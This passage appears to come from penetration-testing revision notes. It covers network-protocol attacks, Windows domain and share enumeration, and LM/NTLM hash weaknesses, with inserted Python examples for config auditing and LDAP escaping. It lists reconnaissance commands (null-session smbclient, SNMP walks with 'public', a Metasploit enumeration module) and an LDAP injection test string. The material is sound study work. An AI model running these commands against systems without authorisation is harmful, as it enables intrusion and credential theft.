the aim is to associate the attacker's MAC address with the IP address of another host, such as the default
gateway, causing any traffic meant for that IP address to be sent to the attacker instead.

MAC Flooding. Since switches are responsible for setting up the virtual circuits from one node to another, they
must keep a translation table that tracks which addresses (specifically, which MAC addresses) are on which
physical port. The amount of memory for this translation table is limited. This fact sometimes allows the switch
to be exploited by flooding the translation table. Primitive switches, not knowing how to handle the excess
data, will 'fail open'. That is, it will revert to a hub and will broadcast all network frames to all ports. At this
point generic network sniffers will work.

MAC Duplicating. It's not difficult to imagine that, since all frames on the network are routed based on their
MAC address, the ability to impersonate another host would work to our advantage. That's just what MAC
duplicating does. You reconfigure Node B to have the same MAC address as the machine whose traffic you're
trying to sniff. This differs from ARP Spoofing because, in ARP Spoofing, we are 'confusing' the host by
poisoning its ARP cache. In a MAC Duplicating attack, we actually confuse the switch itself into thinking two
ports have the same MAC address. Since the data will be forwarded to both ports, no IP forwarding is
necessary.

Dynamic Host Configuration Protocol (DHCP)


Unauthorized DHCP Servers: If a malicious person plants a “rogue” DHCP server, it is possible that this device
could respond to client requests and supply them with spurious configuration information. This could be used
to make clients unusable on the network, or worse, set them up for further abuse later on. For example, a
hacker could exploit a bogus DHCP server to direct a DHCP client to use a router under the hacker's control,
rather than the one the client is supposed to use.

Unauthorized DHCP Clients: A client could be set up that masquerades as a legitimate DHCP client and thereby
obtain configuration information intended for that client; this could then be used to compromise the network
later on. Alternately, a “bad guy” could use software to generate lots of bogus DHCP client requests to use up
all the IP addresses in a DHCP server's pool. More simply, this could be used by a thief to steal an IP address
from an organization for his own use.

Cisco Discovery Protocol (CDP)


The Cisco Discovery Protocol is a proprietary protocol that all Cisco devices can use by default. CDP discovers
other Cisco devices that are directly connected, which makes it possible for the devices to auto-configure their
connection in some cases, simplifying configuration and connectivity. CDP messages are not encrypted.

An attacker can easily use Wireshark or other network analyzer software to sniff information about devices
that CDP is sending across the network in broadcast messages. The Cisco IOS software version discovered via
CDP, in particular, would allow the attacker to research and determine whether there were any security
vulnerabilities specific to that particular version of code. Also, because CDP is unauthenticated, an attacker
could craft bogus CDP packets and have them received by the attacker’s directly connected Cisco device. If the
attacker can get access to the router either via Telnet or SNMP, they can use the CDP information to discover
the entire topology of your network at Layer 2 and 3, including all IOS levels, router and switch model types,
and IP addressing. If somebody was armed with this information and a Cisco bug list, they could launch a very
effective attack against your network.

Hot Standby Router Protocol (HSRP)


Hot Standby Router Protocol (HSRP) is used to provide the access layer with high availability when hosts
require only a default static route. It is used to group two or more Layer 2 routers into one virtual router. The
physical routers keep their MAC and IP addresses, while the virtual router assumes new information, which is
shared between the physical routers.

According to the HSRP RFC, the protocol is not a secure protocol, and is therefore susceptible to Man in the
Middle (MitM) attacks.

Virtual Router Redundancy Protocol (VRRP)


The VRRP or Virtual Router Redundancy Protocol helps you create a reliable network by using multiple routers
in an active/passive configuration. If the primary router fails, the backup router takes over almost seamlessly.

A host within the same subnet could just spoof VRRP packets and disrupt service.

An attack on VRRP is not just theoretical. A tool called Loki allows you to take over the virtual IP-address and
become the master router. This will allow you to create a DoS or sniff all traffic.

According to rfc3768 authentication and security has been deliberately omitted.

VLAN Trunk Protocol (VTP)

This attack is based on Spanning Tree. VTP reduces administration in a switched network. When configuring a
new VLAN on one VTP server, the VLAN is distributed through all switches in the domain. This reduces the
need to configure the same VLAN everywhere. VTP is a Cisco-proprietary protocol that is available on most of
the Cisco Catalyst family products.
After becoming a trunk port, an attacker could send VTP messages as a server with no VLANs configured. All
VLANs would be deleted across the entire VTP domain. This attack could also happen accidentally, e.g. by
inserting a new switch with a bad configuration into the network (Cisco describes this case in
[1]#vtp_ts_rec_ins).
https://www.sans.org/reading-room/whitepapers/networkdevs/virtual-lan-security-weaknesses-countermeasures-1090

Spanning Tree Protocol (STP)


STP is used to maintain loop-free network topologies. This is achieved using Bridge Protocol Data Units (BPDU),
which are very simple packets with no payload. By using BPDUs, a switch is chosen as the Root Bridge, which
then defines how traffic is routed round the network. In such an exchange, it can take around 30 seconds to
establish which switch is to be the Root Bridge. An attacker has two options. One is to repeatedly send
Topology Change Notification (TCN) messages to disrupt the system's current understanding of the network
and force renegotiation of the Root Bridge, resulting in a DoS attack. An alternative is to send a specially
crafted BPDU to try and become the Root Bridge. Once this is done, it is possible for the attacker to see
packets that are not intended for him/her. This is not trivial and requires the attacker to stay connected to
two switches, running bridging software, so that he/she can advertise as a priority zero bridge.

Terminal Access Controller Access-Control System Plus (TACACS+)


TACACS+ is a protocol developed by Cisco and released as an open standard beginning in 1993. Although
derived from TACACS, TACACS+ is a separate protocol that handles authentication, authorization, and
accounting (AAA) services. TACACS+ and other flexible AAA protocols have largely replaced their predecessors.
Known weaknesses:
• Lack of integrity checking
• Vulnerability to replay attacks

More information http://www.openwall.com/articles/TACACS%2B-Protocol-Security

D4) IPSec

Tool:
ipsecscan (ipsecscan is a Win32 command-line utility that can identify IPsec enabled devices and hosts; it's
available at http://ntsecurity.nu/toolbox/ipsecscan/.[1])

nmap -p 500 <IP>

D5) VOIP

Interesting service for VoIP, if identified by nmap:


• Cisco-sccp
• H.323/Q.931
• SIP

SIP = signalling and creating connection
RTP = transport of media

Session Initiation Protocol (SIP)
The Session Initiation Protocol (SIP) is a communications protocol for signaling and controlling multimedia
communication sessions. The most common applications of SIP are in Internet telephony for voice and video
calls, as well as instant messaging, over Internet Protocol (IP) networks.

SIPS is the secure variant of SIP, which adds TLS encryption.
SIP is on port 5060.
SIPS is on port 5061.

Real-time Transport Protocol (RTP)


RTP is a network protocol for delivering audio and video over IP networks. RTP is used extensively in
communication and entertainment systems that involve streaming media, such as telephony, video
teleconference applications, television services and web-based push-to-talk features.

RTP typically runs over User Datagram Protocol (UDP).

D6) Wireless

A client can use two scanning methods: active and passive. During an active scan, the client radio transmits a
probe request and listens for a probe response from an AP. With a passive scan, the client radio listens on each
channel for beacons sent periodically by an AP. A passive scan generally takes more time, since the client must
listen and wait for a beacon versus actively probing to find an AP. Another limitation with a passive scan is that
if the client does not wait long enough on a channel, then the client may miss an AP beacon.

Tools:
Wireshark
Kismet

Wired Equivalent Privacy (WEP)


WEP has three settings: Off (no security), 64-bit and 128-bit.

Temporal Key Integrity Protocol (TKIP)


The RC4 stream cipher is used with a 128-bit per-packet key, meaning that it dynamically generates a new key
for each packet. Used by WPA.

WiFi Protected Access (WPA)


WPA uses TKIP encryption by default but can also use AES.
WPA2 uses AES for encryption.

Lightweight Extensible Authentication Protocol (LEAP)


LEAP is a proprietary wireless LAN authentication method developed by Cisco Systems. Important features of
LEAP are dynamic WEP keys and mutual authentication (between a wireless client and a RADIUS server). LEAP
allows for clients to reauthenticate frequently; upon each successful authentication, the clients acquire a new
WEP key (with the hope that the WEP keys don't live long enough to be cracked). LEAP may be configured to
use TKIP instead of dynamic WEP.

Cisco LEAP, similar to WEP, has had well-known security weaknesses since 2003 involving offline password
cracking.

Extensible Authentication Protocol (EAP)


Originally, only EAP-TLS (Extensible Authentication Protocol - Transport Layer Security) was certified by the Wi-
Fi alliance. In April 2010, the Wi-Fi Alliance announced the inclusion of additional EAP[13] types to its WPA-
and WPA2- Enterprise certification programs.[14] This was to ensure that WPA-Enterprise certified products
can interoperate with one another.

As of 2010 the certification program includes the following EAP types:


• EAP-TLS (previously tested)
• EAP-TTLS/MSCHAPv2 (April 2005 [15])
• PEAPv0/EAP-MSCHAPv2 (April 2005)
• PEAPv1/EAP-GTC (April 2005)
• PEAP-TLS
• EAP-SIM (April 2005)
• EAP-AKA (April 2009 [16])
• EAP-FAST (April 2009)

802.1X clients and servers developed by specific firms may support other EAP types. This certification is an
attempt for popular EAP types to interoperate; their failure to do so as of 2013 is one of the major issues
preventing rollout of 802.1X on heterogeneous networks.

Protected Extensible Authentication Protocol (PEAP)


The Protected Extensible Authentication Protocol, also known as Protected EAP or simply PEAP, is a protocol
that encapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated
Transport Layer Security (TLS) tunnel.[1][2][3][4] The purpose was to correct deficiencies in EAP; EAP assumed
a protected communication channel, such as that provided by physical security, so facilities for protection of
the EAP conversation were not provided.

PEAP was jointly developed by Cisco Systems, Microsoft, and RSA Security.

D7) Configuration Analysis

Cisco IOS devices:


Enable Password:
To set a local password to control access to various privilege levels, use the enable password command in
global configuration mode.

enable password [level level] {password | [encryption-type] encrypted-password}
no enable password [level level]

Syntax Description
• level level: (Optional) Level for which the password applies. You can specify up to 16 privilege levels,
using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this argument is not specified in
the command or the no form of the command, the privilege level defaults to 15 (traditional enable privileges).
• password: Password users type to enter enable mode.
• encryption-type: (Optional) Cisco-proprietary algorithm used to encrypt the password. Currently the only
encryption type available is 5. If you specify encryption-type, the next argument you supply must be an
encrypted password (a password already encrypted by a Cisco router).
• encrypted-password: Encrypted password you enter, copied from another router configuration.

Enable Secret:
To create a new privilege level and associate commands with that privilege level, use the following command,
beginning in global configuration mode:

Router(config)# enable secret level level {0 | 5} password-string

Purpose: Sets the password for the specified privilege level. This is the password users will enter after
entering the enable level command to access the specified level.
• 0 indicates an unencrypted password string follows; 5 indicates an encrypted password string follows.

Syntax Description:
• level level: (Optional) Level for which the password applies. You can specify up to sixteen privilege
levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this argument is
not specified in the command or in the no form of the command, the privilege level defaults to 15
(traditional enable privileges). The same holds true for the no form of the command.
• password: Password for users to enter enable mode. This password should be different from the
password created with the enable password command.
• encryption-type: (Optional) Cisco-proprietary algorithm used to encrypt the password. Currently the
only encryption type available for this command is 5. If you specify encryption-type, the next
argument you supply must be an encrypted password (a password encrypted by a Cisco router).
• encrypted-password: Encrypted password you enter, copied from another router configuration.
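As an added example (not part of these revision notes or of Cisco's documentation), the following Python scans a running-config for the enable password and enable secret forms described above and reports the cases an assessor would flag. The config text is constructed, not taken from a real device; treating type 7 as reversible is based on Cisco's documented service password-encryption behaviour and is not stated in the syntax tables above.

```python
"""Added example, not from the CREST notes or Cisco documentation: scan a
Cisco IOS running-config for the enable-password settings discussed above.
The config text below is constructed for the example."""
import re

# Constructed sample config (not from a real device).
SAMPLE_CONFIG = """\
version 15.2
service password-encryption
hostname edge-rtr
enable password level 5 7 094F471A1A0A
enable secret 5 $1$saltsalt$abcdefghijklmnopqrstuv
username admin privilege 15 password 0 Admin123
line vty 0 4
 password 7 0822455D0A16
 login
"""

# enable {password|secret} [level N] [type] value
ENABLE_RE = re.compile(r"^enable (password|secret)(?: level (\d+))?(?: (\d+))? (\S+)$")

def find_enable_lines(config: str) -> list[dict]:
    """One record per 'enable password' / 'enable secret' line: kind, privilege
    level (defaults to 15 as in the syntax description), encryption type
    (0 = cleartext, 5 = secret hash, 7 = reversible service password-encryption)
    and the stored value."""
    records = []
    for line in config.splitlines():
        m = ENABLE_RE.match(line.strip())
        if not m:
            continue
        kind, level, enc, value = m.groups()
        records.append({
            "kind": kind,
            "level": int(level) if level else 15,
            "enc": int(enc) if enc is not None else 0,
            "value": value,
        })
    return records

def audit_enable(config: str) -> list[str]:
    """Flag weak enable settings: any 'enable password' (type 0 is cleartext,
    type 7 is trivially reversible) and any privilege level whose only
    protection is an enable password with no enable secret."""
    findings = []
    records = find_enable_lines(config)
    secret_levels = {r["level"] for r in records if r["kind"] == "secret"}
    for r in records:
        if r["kind"] == "password":
            how = "cleartext" if r["enc"] == 0 else f"type {r['enc']} (reversible)"
            findings.append(f"level {r['level']}: enable password stored as {how}")
            if r["level"] not in secret_levels:
                findings.append(f"level {r['level']}: no enable secret, enable password is the only control")
    if not records:
        findings.append("no enable password or secret configured")
    if "service password-encryption" not in config.splitlines():
        findings.append("service password-encryption not set: type 0 passwords stay cleartext in the config")
    return findings

if __name__ == "__main__":
    for finding in audit_enable(SAMPLE_CONFIG):
        print(finding)
```

Run against a saved `show running-config`, the checks reduce to: prefer enable secret over enable password for every level that has one, and make sure nothing is left at type 0.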

4) Microsoft Windows Security Assessment
E1) Domain Reconnaissance

Identifying domains/workgroups and domain membership within the target network.


• Difference Workgroup/Domain:
o A domain is a collection of servers and clients that are managed by a central security system
(Active Directory hosted on the Domain Controller). Active Directory controls what
computers can communicate within the domain and which users can access shared
resources.
o A workgroup does not have a central control, every system is a peer and no security
information is shared or enforced outside of each individual box.

• The Domain Master Browser is necessary on a routed TCP/IP network, that is, when a Windows
domain spans more than one TCP/IP network. When a Windows domain spans multiple subnets each
of the subnets has an independent browser called the Master Browser. The Master Browser is
responsible for the browse list within its respective subnet and portion of the domain on its subnet.

Locally on Windows:
• Check locally on a Windows Server/Client. This will list both Local and Global groups that the user belongs
to.
o net user <userName> /domain

Remote:
• Identify the "Master Browser" on a Windows machine:
o nbtstat -A COMPUTER-NAME

o The numeric values are called suffixes. For example, the <01> and <1D> suffixes indicate the
Master Browser, <20> that the machine is running the File Server service, <03> that the
Messenger service is running and <00> that the Workstation service is running as well.
<1E> is the Browser Service Elections.

• Scan with nbtscan on Kali. nbtscan is a NetBIOS name server scanner which has the same functions
as nbtstat but operates on a range of addresses instead of one.
o nbtscan 192.168.0.1-254

o The output lists the IP addresses, the NetBIOS names, the users that are logged in and the MAC
addresses of the hosts that are running the NetBIOS service on the network.
o With the verbose option (-v) the output format is similar to nbtstat. Again <01> indicates the
Master Browser service, <00> the workstation, <20> the File Server service and <1e> and
<1d> the Browser Service Elections and the Master Browser. The output also shows the
domain that the workstation belongs to, London in this example.
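The suffix decoding described above, as an added example that is not part of the revision notes: a small Python parser that takes an nbtstat -A style name table and turns the <00>/<03>/<1D>/<1E>/<20>/<01> entries into the host facts an assessor records (host name, domain, file server, master browser, logged-on users). The table text is constructed for this example; the <1B> and <1C> entries are standard NetBIOS suffixes added beyond the list in the notes.

```python
"""Added example, not from the CREST notes: decode an nbtstat -A style
NetBIOS name table into the services described above. The table text is
constructed for this example, not captured from a real host."""
import re

# Constructed sample in the layout nbtstat -A prints (Name, Type, Status).
SAMPLE_TABLE = """\
           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    FILESRV01      <00>  UNIQUE      Registered
    LONDON         <00>  GROUP       Registered
    FILESRV01      <20>  UNIQUE      Registered
    LONDON         <1E>  GROUP       Registered
    LONDON         <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    FILESRV01      <03>  UNIQUE      Registered
    JSMITH         <03>  UNIQUE      Registered

    MAC Address = 00-0C-29-AB-CD-EF
"""

ROW_RE = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+\w+")

# (suffix, type) -> service, as listed in the notes above plus the standard
# <1B>/<1C> domain entries.
SUFFIXES = {
    ("00", "UNIQUE"): "Workstation Service (host name)",
    ("00", "GROUP"): "Domain / workgroup name",
    ("03", "UNIQUE"): "Messenger Service (host or logged-on user)",
    ("20", "UNIQUE"): "File Server Service",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
    ("01", "GROUP"): "Master Browser (__MSBROWSE__)",
}

def parse_name_table(text):
    """Return (name, suffix, type) tuples for every registered-name row."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append((m.group(1).upper(), m.group(2).upper(), m.group(3)))
    return rows

def describe(name, suffix, kind):
    """Human-readable service for one row (unknown suffixes are reported as such)."""
    return SUFFIXES.get((suffix, kind), f"unknown suffix <{suffix}> ({kind}) for {name}")

def summarize(text):
    """Collapse the table into the facts an assessor records for the host."""
    rows = parse_name_table(text)
    hostname = next((n for n, s, k in rows if (s, k) == ("00", "UNIQUE")), None)
    return {
        "hostname": hostname,
        "domain": next((n for n, s, k in rows if (s, k) == ("00", "GROUP")), None),
        "file_server": any((s, k) == ("20", "UNIQUE") for _, s, k in rows),
        "master_browser": any((s, k) in {("1D", "UNIQUE"), ("01", "GROUP")} for _, s, k in rows),
        "domain_master_browser": any((s, k) == ("1B", "UNIQUE") for _, s, k in rows),
        "browser_elections": any((s, k) == ("1E", "GROUP") for _, s, k in rows),
        # <03> names that are not the host itself are logged-on users
        "logged_on_users": sorted({n for n, s, k in rows
                                   if (s, k) == ("03", "UNIQUE") and n != hostname}),
    }

if __name__ == "__main__":
    for row in parse_name_table(SAMPLE_TABLE):
        print(row, "->", describe(*row))
    print(summarize(SAMPLE_TABLE))
```

The same parser works on nbtscan -v output once the per-host blocks are split, since both tools print the same name/suffix/type triples.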

MSBROWSE

Identifying and analysing internal browse lists.


What is a browse list? Read this: https://en.wikipedia.org/wiki/Domain_Master_Browser
How can the internal browse list be analysed?

Identifying and analysing accessible SMB shares:


By using Unix:
• nmap --script smb-enum-shares.nse -p445 <host>
• sudo nmap -sU -sS --script smb-enum-shares.nse -p U:137,T:139 <host>
• nmblookup -A <IP> (get Netbios Name that can be used for smbclient)
• smbclient -L \\NetBiosName -I <IP> -N
o -L List available shares, this can also show logged in users.
o -N suppresses password prompt. Instead also -U can be used to specify the username if any
is known.
• smbclient //NetBiosName/share -I <IP> -U <username>
o Connect to share. Files can be downloaded (get) or uploaded (put) or read directly using
(more)

• Mount share:
o mount -t cifs //servername/foldername /localmountpoint -o
username=myusername,password=mypassword

By using Windows:
• To see a list of shares on a remote computer
o NET VIEW \\ComputerName
• To see a list of all shares in the domain:
o NET VIEW /DOMAIN
• To see a list of shares on a different domain
o NET VIEW /DOMAIN:domainname
• Mount share:
o net use z: \\<IP>\share password /user:Domain\user
• net share

IIS Version Hosting Operating System

E2) User Enumeration

NetBIOS
• Enumerates NetBIOS information on host 192.168.1.1 as the null user.
o nbtenum -q 192.168.1.1
• Scan with nbtscan on Kali. nbtscan is a NetBIOS name server scanner which has the same functions
as nbtstat but operates on a range of addresses instead of one.
o nbtscan 192.168.0.1-254

o The output lists the IP addresses, the NetBIOS names, the users that are logged in and the MAC
addresses of the hosts that are running the NetBIOS service on the network.

o With the verbose option (-v) the output format is similar to nbtstat. Again <01> indicates the
Master Browser service, <00> the workstation, <20> the File Server service and <1e> and
<1d> the Browser Service Elections and the Master Browser. The output also shows the
domain that the workstation belongs to, London in this example.

SNMP
• msf > use auxiliary/scanner/snmp/snmp_enumusers
• snmpwalk
o snmpwalk -c public -v 2c <IP>
• snmpcheck
o snmpcheck -t <IP> -c public

LDAP
• LDAP searches can also be done with jxplorer (GUI tool)
• Query LDAP by using nmap:
o nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=users,ldap.attrib=sAMAccountName' <host>

What symbols to use to test LDAP injection?


https://www.owasp.org/index.php/Testing_for_LDAP_Injection_(OTG-INPVAL-006)
Boolean conditions and group aggregations on an LDAP search filter could be applied by using the following
metacharacters:

Metachar   Meaning
&          Boolean AND
|          Boolean OR
!          Boolean NOT
=          Equals
~=         Approx
>=         Greater than
<=         Less than
*          Any character
()         Grouping parenthesis
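The fix for the metacharacters above is to escape user input before it goes into a filter. As an added example (not part of the revision notes or of the OWASP page), the Python below implements RFC 4515 filter-value escaping and shows the same lookup built unsafely and safely; the `sAMAccountName` lookup and the test payload are constructed for the example.

```python
"""Added example, not from the CREST notes or the OWASP page: escaping user
input before it is placed into an LDAP search filter, which is the defence
against the metacharacters listed above. The escaping follows RFC 4515."""

# RFC 4515: these characters must appear as \XX (hex) inside a filter value.
# Backslash is escaped first so the backslashes introduced by the other
# replacements are not escaped a second time.
_ESCAPES = [("\\", "\\5c"), ("*", "\\2a"), ("(", "\\28"), (")", "\\29"), ("\x00", "\\00")]

def escape_filter_value(value: str) -> str:
    """Escape a value so it can only ever be matched as a literal string."""
    for raw, escaped in _ESCAPES:
        value = value.replace(raw, escaped)
    return value

def user_filter_unsafe(username: str) -> str:
    """The vulnerable pattern: concatenating input straight into the filter."""
    return f"(&(objectClass=user)(sAMAccountName={username}))"

def user_filter_safe(username: str) -> str:
    """Same lookup with the value escaped; the filter structure cannot change."""
    return f"(&(objectClass=user)(sAMAccountName={escape_filter_value(username)}))"

def filter_clause_count(ldap_filter: str) -> int:
    """Count unescaped '(' in a filter: a fixed template has a fixed count,
    so a higher number means input changed the filter's structure."""
    count, i = 0, 0
    while i < len(ldap_filter):
        if ldap_filter[i] == "\\":
            i += 3          # skip one \XX escape sequence
            continue
        if ldap_filter[i] == "(":
            count += 1
        i += 1
    return count

if __name__ == "__main__":
    # The classic test value from the OWASP page referenced above.
    payload = "*)(uid=*))(|(uid=*"
    print(user_filter_unsafe(payload), filter_clause_count(user_filter_unsafe(payload)))
    print(user_filter_safe(payload), filter_clause_count(user_filter_safe(payload)))
```

The clause count is the check to keep in mind when reviewing code: a template with three clauses must still have three after the input is inserted, and only escaping (or a parameterised LDAP API that escapes for you) guarantees that.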

E3) Active Directory

Active Directory Roles (Global Catalogue, Master Browser, FSMO)


For details see https://support.microsoft.com/en-sg/kb/197132
and https://wiki.samba.org/index.php/Flexible_Single-Master_Operations_(FSMO)_roles

Forests, trees, and domains


The Active Directory framework that holds the objects can be viewed at a number of levels. The forest, tree,
and domain are the logical divisions in an Active Directory network.

Within a deployment, objects are grouped into domains. The objects for a single domain are stored in a single
database (which can be replicated). Domains are identified by their DNS name structure, the namespace.

A domain is defined as a logical group of network objects (computers, users, devices) that share the same
Active Directory database.

A tree is a collection of one or more domains and domain trees in a contiguous namespace, linked in a
transitive trust hierarchy.
At the top of the structure is the forest. A forest is a collection of trees that share a common global catalog,
directory schema, logical structure, and directory configuration. The forest represents the security boundary
within which users, computers, groups, and other objects are accessible.

Reliance of AD on DNS and LDAP

Group Policy (Local Security Policy)


• On a Windows Server gpresult can be used to verify all policy settings (Group Policy Results).
o gpresult > gp.txt

E4) Windows Passwords

Password policies (complexity, lockout policies)


Different parameters can be set in GPO (Group Policy Object):
• Enforce password history
• Maximum password age
• Minimum password age
• Minimum password length
• Password must meet complexity requirements
• Store passwords using reversible encryption
https://technet.microsoft.com/en-us/library/hh994572(v=ws.11).aspx

Hash Storage (merits of LANMAN, NTLMv1 / v2)


https://en.wikipedia.org/wiki/NT_LAN_Manager
• LANMAN:
LM hash, LanMan hash, or LAN Manager hash is a compromised password hashing function that was
the primary hash that Microsoft LAN Manager and Microsoft Windows versions prior to Windows NT
used to store user passwords. Support for the legacy LAN Manager protocol continued in later
versions of Windows for backward compatibility, but was recommended by Microsoft to be turned off
by administrators; as of Windows Vista, the protocol is disabled by default, but continues to be used
by some non-Microsoft CIFS implementations.

o The LM hash is computed as follows:


▪ The user's password is restricted to a maximum of fourteen characters.
▪ The user’s password is converted to uppercase.
▪ The user's password is encoded in the System OEM code page.
▪ This password is null-padded to 14 bytes.
▪ The “fixed-length” password is split into two 7-byte halves.
▪ These values are used to create two DES keys, one from each 7-byte half, by
converting the seven bytes into a bit stream with the most significant bit first, and
inserting a null bit after every seven bits (so 1010100 becomes 10101000). This
generates the 64 bits needed for a DES key. (A DES key ostensibly consists of 64 bits;
however, only 56 of these are actually used by the algorithm. The null bits added in
this step are later discarded.)
▪ Each of the two keys is used to DES-encrypt the constant ASCII string
“KGS!@#$%”, resulting in two 8-byte ciphertext values. The DES
CipherMode should be set to ECB, and PaddingMode should be set to NONE.
▪ These two ciphertext values are concatenated to form a 16-byte value, which is the
LM hash.
• NTLMv1
The server authenticates the client by sending an 8-byte random number, the challenge. The client
performs an operation involving the challenge and a secret shared between client and server,
specifically one of the two password hashes described above. The client returns the 24-byte result of
the computation. In fact, in NTLMv1 the computations are usually made using both hashes and both
24-byte results are sent. The server verifies that the client has computed the correct result, and from
this infers possession of the secret, and hence the authenticity of the client.

Both the hashes produce 16-byte quantities. Five bytes of zeros are appended to obtain 21 bytes. The
21 bytes are separated in three 7-byte (56-bit) quantities. Each of these 56-bit quantities is used as a
key to DES encrypt the 64 bit challenge. The three encryptions of the challenge are reunited to form
the 24-byte response. Both the response using the LM hash and the NT hash are returned as the
response, but this is configurable.

• NTLMv2
NTLMv2, introduced in Windows NT 4.0 SP4,[13] is a challenge-response authentication protocol. It is
intended as a cryptographically strengthened replacement for NTLMv1.
NTLM version 2 (NTLMv2), which was introduced in Windows NT 4.0 SP4 (and natively supported in
Windows 2000), enhances NTLM security by hardening the protocol against many spoofing attacks,
and adding the ability for a server to authenticate to the client.[1][14][15]

NTLMv2 sends two responses to an 8-byte server challenge. Each response contains a 16-byte HMAC-
MD5 hash of the server challenge, a fully/partially randomly generated client challenge, and an
HMAC-MD5 hash of the user's password and other identifying information. The two responses differ
in the format of the client challenge. The shorter response uses an 8-byte random value for this
challenge. In order to verify the response, the server must receive as part of the response the client
challenge. For this shorter response, the 8-byte client challenge appended to the 16-byte response
makes a 24-byte package which is consistent with the 24-byte response format of the previous
NTLMv1 protocol. In certain non-official documentation (e.g. DCE/RPC Over SMB, Leighton) this
response is termed LMv2.

The second response sent by NTLMv2 uses a variable length client challenge which includes (1) the
current time in NT Time format, (2) an 8-byte random value, (3) the domain name and (4) some standard
format fields. The response must include a copy of this client challenge, and is therefore variable length.
In non-official documentation, this response is termed NTv2.
Both LMv2 and NTv2 hash the client and server challenge with the NT hash of the user's password
and other identifying information. The exact formula is to begin with the NT hash, which is stored in
the SAM or AD, and continue to hash in, using HMAC-MD5, the username and domain name.
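As an added example covering the LM, NTLMv1 and NTLMv2 descriptions above (not part of the revision notes or of Wikipedia), the Python below carries out the key-preparation steps that make LM and NTLMv1 weak and the HMAC-MD5 chain of NTLMv2. DES and MD4 are not implemented here: the LM and NTLMv1 functions stop at the DES keys they would use, and the NT hash is passed in as a constructed 16-byte value. The empty-password LM half AAD3B435B51404EE is a known constant used as a defender check on dumped hashes.

```python
"""Added example, not from the CREST notes or Wikipedia: the key-preparation
steps that make LM and NTLMv1 weak, and the HMAC-MD5 chain of NTLMv2, in
Python. DES itself and MD4 (the NT hash) are not implemented here; where a
16-byte hash is needed it is passed in as a constructed value."""
import hashlib
import hmac

# LM hash of the empty password: both halves are DES("KGS!@#$%") under a
# null key, so the second half of any LM hash for a password of at most 7
# characters equals this constant.
EMPTY_LM_HALF = bytes.fromhex("AAD3B435B51404EE")

def expand_des_key(seven: bytes) -> bytes:
    """Turn 7 bytes (56 bits) into an 8-byte DES key by inserting a zero bit
    after every seven bits, most significant bit first (1010100 -> 10101000).
    DES discards those 8 bits, so the key has only 56 bits of entropy."""
    if len(seven) != 7:
        raise ValueError("need exactly 7 bytes")
    bits = "".join(f"{b:08b}" for b in seven)
    return bytes(int(bits[i:i + 7] + "0", 2) for i in range(0, 56, 7))

def lm_halves(password: str) -> tuple[bytes, bytes]:
    """LM pre-processing: truncate to 14 characters, uppercase, encode in the
    OEM code page (cp437 assumed here), null-pad to 14 bytes, split in two."""
    raw = password[:14].upper().encode("cp437", errors="replace").ljust(14, b"\x00")
    return raw[:7], raw[7:]

def lm_des_keys(password: str) -> tuple[bytes, bytes]:
    """The two DES keys that would each encrypt the constant "KGS!@#$%"."""
    first, second = lm_halves(password)
    return expand_des_key(first), expand_des_key(second)

def lm_password_is_short(lm_hash: bytes) -> bool:
    """Defender check on a dumped LM hash: a second half equal to the
    empty-password constant means the password was 7 characters or fewer."""
    return len(lm_hash) == 16 and lm_hash[8:] == EMPTY_LM_HALF

def ntlmv1_des_keys(hash16: bytes) -> tuple[bytes, bytes, bytes]:
    """NTLMv1: pad the 16-byte LM or NT hash with five zero bytes to 21 bytes,
    split into three 7-byte pieces and expand each into a DES key; each key
    encrypts the 8-byte server challenge to give the 24-byte response.
    The third key carries only two bytes of the hash (16 bits of entropy)."""
    padded = hash16 + b"\x00" * 5
    k1, k2, k3 = (expand_des_key(padded[i:i + 7]) for i in range(0, 21, 7))
    return k1, k2, k3

def ntlmv2_hash(nt_hash: bytes, username: str, domain: str) -> bytes:
    """NTLMv2 hash = HMAC-MD5(NT hash, UTF-16LE(upper(username) + domain))."""
    identity = (username.upper() + domain).encode("utf-16le")
    return hmac.new(nt_hash, identity, hashlib.md5).digest()

def ntlmv2_response(nt_hash: bytes, username: str, domain: str,
                    server_challenge: bytes, client_challenge: bytes) -> bytes:
    """Response = HMAC-MD5(NTLMv2 hash, server challenge || client challenge).
    With an 8-byte client challenge this is the LMv2 response; with the
    timestamped blob it is the NTv2 response."""
    key = ntlmv2_hash(nt_hash, username, domain)
    return hmac.new(key, server_challenge + client_challenge, hashlib.md5).digest()

if __name__ == "__main__":
    print(lm_halves("Passw0rd!23456789"))          # two independent 7-byte halves
    print(lm_des_keys("secret")[1].hex())           # second key is all zero bits
    nt = bytes(range(16))                           # constructed stand-in for an NT hash
    print(ntlmv2_response(nt, "alice", "LONDON", b"\x01" * 8, b"\x02" * 8).hex())
```

Two things the code makes visible that the prose only states: an LM hash is really two independent 7-character problems (and `lm_password_is_short` spots the short ones in a dump without cracking anything), and NTLMv1's third DES key is derived from only 16 bits of the hash, which is why it is so cheap to attack and why NTLMv2 replaces the DES construction with keyed HMAC-MD5.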

Weakness and Vulnerabilities of NTLM

NTLM remains vulnerable to the pass the hash attack, which is a variant on the reflection attack which was
addressed by Microsoft security update MS08-068. For example, Metasploit can be used in many cases to
obtain credentials from one machine which can be used to gain control of another machine.[3][25] The
Squirtle toolkit can be used to leverage web site cross-site scripting attacks into attacks on nearby assets via
NTLM.[26]

In February 2010, Amplia Security discovered several flaws in the Windows implementation of the NTLM
authentication mechanism which broke the security of the protocol allowing attackers to gain read/write
access to files and remote code execution. One of the attacks presented included the ability to predict pseudo-
random numbers and challenges/responses generated by the protocol. These flaws had been present in all
versions of Windows for 17 years. The security advisory explaining these issues included fully working proof-of-
concept exploits. All these flaws were fixed by MS10-012.[27][28]

In 2012, it was demonstrated that every possible 8-character NTLM password hash permutation can be
cracked in under 6 hours.[29]

